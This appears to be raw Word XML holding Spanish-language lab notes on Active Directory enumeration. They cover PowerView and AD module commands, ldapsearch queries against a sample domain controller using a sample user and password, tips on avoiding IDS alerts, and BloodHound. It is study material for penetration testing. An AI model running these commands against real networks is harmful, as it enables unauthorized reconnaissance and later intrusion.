    <w:p w14:paraId="62BCAC44" w14:textId="3D715CBC" w:rsidR="004471E6" w:rsidRPr="004471E6" w:rsidRDefault="004471E6" w:rsidP="00EC1DAF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1DAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t xml:space="preserve">Recopilación </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>Remota</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1DAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t xml:space="preserve"> de SAM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C01C9A3" w14:textId="04E8628E" w:rsidR="00EC1DAF" w:rsidRPr="000F6613" w:rsidRDefault="004471E6" w:rsidP="00917194">
      <w:r w:rsidRPr="000F6613">
        <w:t>Para la realización de estas consultas, es necesario tener en nuestra máquina Windows 10 la dll</w:t>
      </w:r>
      <w:r w:rsidR="000F6613">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6613">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6613">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microsoft.ActiveDirectory.Management.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBC51C3" w14:textId="62198433" w:rsidR="000F6613" w:rsidRDefault="004471E6" w:rsidP="000F6613">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6613">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>La podemos conseguir instalando un Windows Server en una máquina virtual y copiándola desde C:\</w:t>
      </w:r>
      <w:r w:rsidR="000F6613" w:rsidRPr="000F6613">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Windows\Microsoft.NET\assembly\GAC_64\ActiveDirectory.Management\ Dentro hay una carpeta que contiene el DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A77F82" w14:textId="70F3FE66" w:rsidR="000F6613" w:rsidRPr="00266BCE" w:rsidRDefault="00266BCE" w:rsidP="00266BCE">
      <w:r w:rsidRPr="00266BCE">
        <w:t>Y desde la máquina Windows 10 usamos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7384C4" w14:textId="07F19596" w:rsidR="00266BCE" w:rsidRDefault="00266BCE" w:rsidP="00266BCE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00266BCE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Import-Module .\Microsoft.ActiveDirectory.Management.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A045509" w14:textId="7720EDBB" w:rsidR="00266BCE" w:rsidRDefault="00266BCE" w:rsidP="00266BCE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ya podemos usar comandos como: </w:t>
      </w:r>
      <w:r w:rsidRPr="00266BCE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-Addomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454D18D8" w14:textId="26B1335F" w:rsidR="00266BCE" w:rsidRDefault="00266BCE" w:rsidP="00266BCE">
      <w:r>
        <w:t>Es importante saber que el tráfico de red generado son paquetes en TCP, no en RPC. Y si usamos el Get-Netdomain, generaremos tráfico en protocolo LDAP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770C98B4" w14:textId="28655A4F" w:rsidR="00266BCE" w:rsidRDefault="00266BCE" w:rsidP="00266BCE">
      <w:r>
        <w:t>Algunos comandos  | Análogo de PowerView:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFECB27" w14:textId="20E77604" w:rsidR="00266BCE" w:rsidRDefault="00266BCE" w:rsidP="00266BCE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00266BCE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-ADDomain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|Get-NetDomain</w:t>
      </w:r>
      <w:r w:rsidRPr="00266BCE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nos recopila información de todo el dominio. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA734E4" w14:textId="7DF0AF58" w:rsidR="0069175B" w:rsidRDefault="0069175B" w:rsidP="00266BCE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0069175B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-DomainPolicy:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nos recopila la información de las directivas del dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1583C92B" w14:textId="25A02E00" w:rsidR="0069175B" w:rsidRDefault="0069175B" w:rsidP="00266BCE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0069175B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-ADDomainController| Get-NetDomainController:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nos recopila información del DC, incluida su IP, en caso de PowerView, incluso el Sistema Operativo, ideal para buscar exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1172FF" w14:textId="1C6E8B7E" w:rsidR="0069175B" w:rsidRDefault="0069175B" w:rsidP="00266BCE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0069175B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-ADUser -Filter *</w:t>
      </w:r>
      <w:r w:rsidR="006E0462">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|Get-Net</w:t>
      </w:r>
      <w:r w:rsidR="003640F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="006E0462">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ser</w:t>
      </w:r>
      <w:r w:rsidRPr="0069175B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nos devuelve TODOS los usuarios de el dominio</w:t>
      </w:r>
      <w:r w:rsidR="006E0462">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CF8C0F" w14:textId="57E66C8D" w:rsidR="00876CC3" w:rsidRDefault="00876CC3" w:rsidP="00266BCE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00876CC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-ADComputer -Filter *| Get-NetComputer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Información de todos los equipos del dominio.</w:t>
      </w:r>
      <w:r w:rsidR="001F7216">
        <w:t xml:space="preserve"> Para saber si están encendidos o no, en PowerView podemos poner  </w:t>
      </w:r>
      <w:r w:rsidR="001F7216" w:rsidRPr="001F7216">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-NetComputer -Ping</w:t>
      </w:r>
      <w:r w:rsidR="001F7216">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDF5509" w14:textId="0AF5BA9D" w:rsidR="000B6E39" w:rsidRDefault="000B6E39" w:rsidP="000B6E39">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1004BD87" w14:textId="3D6F7E8F" w:rsidR="000B6E39" w:rsidRPr="000B6E39" w:rsidRDefault="000B6E39" w:rsidP="000B6E39">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="000B6E39">
        <w:t>A partir de ahora, estos comando son de PowerView, por supuesto, tienen su análogo en AD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79570E29" w14:textId="6B27D914" w:rsidR="000B6E39" w:rsidRDefault="000B6E39" w:rsidP="000B6E39">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B6E39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-DomainGroup:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Obtenemos TODOS los grupos del dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BFB61F" w14:textId="3D761BDF" w:rsidR="000B6E39" w:rsidRDefault="000B6E39" w:rsidP="000B6E39">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Get-NetGroupMember -Identity “Administradores”: </w:t>
      </w:r>
      <w:r>
        <w:t>Usuarios que pertenecen al grupo de Administradores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D35523" w14:textId="1113F615" w:rsidR="000B6E39" w:rsidRDefault="000B6E39" w:rsidP="000B6E39">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B6E39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Find-DomainShare:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Puede tardar unos minutos. Nos devuelve TODOS los recursos compartidos del dominio. CUIDADO, HACE MUHO RUIDO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D44019" w14:textId="1D995890" w:rsidR="000B6E39" w:rsidRDefault="000B6E39" w:rsidP="000B6E39">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6E39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetOU</w:t>
      </w:r>
      <w:r>
        <w:t>: Enumera las Unidades Organizativas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE75B24" w14:textId="4E8DA5AB" w:rsidR="000B6E39" w:rsidRDefault="000B6E39" w:rsidP="000B6E39">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B6E39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-NetGPO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Enumera TODAS las GPOs. Con </w:t>
      </w:r>
      <w:r w:rsidRPr="000B6E39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-NetGPO -ComputerIdentity WS02</w:t>
      </w:r>
      <w:r>
        <w:t>, por ejemplo, podríamos saber que GPOs está aplicandose a WS02.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E480502" w14:textId="22545FD1" w:rsidR="000B6E39" w:rsidRDefault="000B6E39" w:rsidP="000B6E39">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Get-ObjectAcl: Enumera TODAS las ACLs. Con </w:t>
      </w:r>
      <w:r w:rsidRPr="000B6E39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-ObjectAcl -SamAccountName empleado1</w:t>
      </w:r>
      <w:r>
        <w:t>, por ejemplo, podríamos saber que ACLs tiene empleado1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EC9990" w14:textId="160DE031" w:rsidR="000B6E39" w:rsidRDefault="000B6E39" w:rsidP="000B6E39">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B6E39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Get-NetForestDomain:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Podemos ver los bosques que hay y si hay más dominios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5E7BFD" w14:textId="2B48CBCE" w:rsidR="000B6E39" w:rsidRDefault="000B6E39" w:rsidP="000B6E39">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B6E39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Find-LocalAdminAccess -Verbose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Busca todas las máquinas del dominio que tengan un administrador local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1103B86A" w14:textId="20C98928" w:rsidR="000A2EDB" w:rsidRDefault="000A2EDB" w:rsidP="000B6E39">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Invoke</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2EDB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-EnumerateLocalAdmin -Verbose</w:t>
      </w:r>
      <w:r>
        <w:t>: Enumera usuarios administradores de distintos equipos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A87FC2" w14:textId="3A8D2DBE" w:rsidR="00660118" w:rsidRDefault="00660118" w:rsidP="000B6E39">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Invoke</w:t>
      </w:r>
      <w:r w:rsidRPr="00660118">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-UserHunter:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Busca usuarios que hayan comenzado sesiones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A51041" w14:textId="77777777" w:rsidR="006E0462" w:rsidRPr="006E0462" w:rsidRDefault="006E0462" w:rsidP="006E0462">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E0462">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Recuerda que podemos filtrar después del comando con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77809DD8" w14:textId="427B48D9" w:rsidR="006E0462" w:rsidRPr="006E0462" w:rsidRDefault="006E0462" w:rsidP="006E0462">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E0462">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>| select (campo específico a obtener)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB9E641" w14:textId="2A7415F6" w:rsidR="006E0462" w:rsidRPr="006E0462" w:rsidRDefault="006E0462" w:rsidP="006E0462">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E0462">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>| select name, lastlogon, lastlofoff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA24CAB" w14:textId="7D43AE07" w:rsidR="0069175B" w:rsidRDefault="0069175B" w:rsidP="0069175B">
      <w:r>
        <w:t>El problema con PowerView, aunque poco, puede generar avisos a un IDS. AUnque realmente es muy poco, para ser puristas, es más silencioso usando la DLL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB7F7A4" w14:textId="6908CAB1" w:rsidR="003640F1" w:rsidRDefault="003B5880" w:rsidP="0069175B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B5880">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerar NTDS en Kali con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="003B5880">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>dapsearch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18330C3F" w14:textId="67DE1D06" w:rsidR="003B5880" w:rsidRDefault="003B5880" w:rsidP="0069175B">
      <w:r>
        <w:t>Lo primero que hay que mirar es si tiene el acceso anónimo está configurado (No suele ocurrir):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0983B020" w14:textId="5F681A88" w:rsidR="003B5880" w:rsidRDefault="003B5880" w:rsidP="0069175B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B5880">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ldapsearch -x  -H ldap://192.168.20.5 -D '' -w '' -b "DC=corp,DC=local"   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A83053" w14:textId="5CC8F83C" w:rsidR="003B5880" w:rsidRDefault="003B5880" w:rsidP="0069175B">
      <w:r>
        <w:t>Con -D indicamos el nombre de usaurio vacío y con -w indicamos la contraseña.</w:t>
      </w:r>
      <w:r w:rsidR="001F4718">
        <w:t xml:space="preserve"> Así que probamos con un usuario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B505E" w14:textId="715EC327" w:rsidR="003B5880" w:rsidRDefault="003B5880" w:rsidP="0069175B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F4718">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ldapsearch -x  -H ldap://192.168.20.5 -D 'CORP\empleado1' -w 'Passw0rd1' -b "DC=corp,DC=local"   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703D3941" w14:textId="44D7FE10" w:rsidR="001F4718" w:rsidRDefault="001F4718" w:rsidP="0069175B">
      <w:r>
        <w:t>También podemos filtrar objetos según lo que nos interese, agregandole, por ejemplo, usuarios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E24F4F" w14:textId="1CD4E056" w:rsidR="001F4718" w:rsidRDefault="001F4718" w:rsidP="001F4718">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F4718">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ldapsearch -x  -H ldap://192.168.20.5 -D 'CORP\empleado1' -w 'Passw0rd1' -b "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CN=Users,</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4718">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DC=corp,DC=local"   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BEAF3F" w14:textId="1421320B" w:rsidR="001F4718" w:rsidRDefault="001F4718" w:rsidP="0069175B">
      <w:r>
        <w:t>Por ejemplo ordenadores:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107211B3" w14:textId="546643CE" w:rsidR="001F4718" w:rsidRDefault="001F4718" w:rsidP="001F4718">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F4718">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ldapsearch -x  -H ldap://192.168.20.5 -D 'CORP\empleado1' -w 'Passw0rd1' -b "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CN=Computers,</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4718">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DC=corp,DC=local"   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E717709" w14:textId="01FBFCAE" w:rsidR="001F4718" w:rsidRDefault="001F4718" w:rsidP="0069175B">
      <w:r>
        <w:t>O los usuarios Administradores:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B4117E" w14:textId="5EC04BF0" w:rsidR="001F4718" w:rsidRDefault="001F4718" w:rsidP="001F4718">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F4718">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ldapsearch -x  -H ldap://192.168.20.5 -D 'CORP\empleado1' -w 'Passw0rd1' -b "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CN=Administradores,CN=Builtin,</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4718">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DC=corp,DC=local"   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD3DB60" w14:textId="249CA654" w:rsidR="00B069EC" w:rsidRPr="00A61DCD" w:rsidRDefault="00B069EC" w:rsidP="00A61DCD">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61DCD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>Otras herramientas similares:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54437E0B" w14:textId="78F47F51" w:rsidR="00B069EC" w:rsidRPr="00A61DCD" w:rsidRDefault="00B069EC" w:rsidP="00A61DCD">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61DCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>pywerview get-netuser -u empleado1 --dc-ip 192.168.20.5 -p Passw0rd1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668CFEC1" w14:textId="4508F346" w:rsidR="00B069EC" w:rsidRPr="00A61DCD" w:rsidRDefault="00B069EC" w:rsidP="00A61DCD">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61DCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>jxplorer</w:t>
      </w:r>
      <w:r w:rsidR="00A61DCD" w:rsidRPr="00A61DCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00A61DCD" w:rsidRPr="00A61DCD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>Herramienta gráfica para conectarse a la LDAP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D08CBD" w14:textId="77777777" w:rsidR="001F4718" w:rsidRDefault="001F4718" w:rsidP="00A61DCD"/>
    <w:p w14:paraId="617AD024" w14:textId="05B7A310" w:rsidR="00A61DCD" w:rsidRDefault="00A61DCD" w:rsidP="00A61DCD">
      <w:r w:rsidRPr="00A61DCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>BloudHound:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Herramienta de recopilación de datos para Active Directory y </w:t>
      </w:r>
      <w:r w:rsidR="009309F6">
        <w:t xml:space="preserve">CASI de </w:t>
      </w:r>
      <w:r>
        <w:t>análisis de vulnerabilidades. La herramienta estrella contra AD DS.</w:t>
      </w:r>
    </w:p>
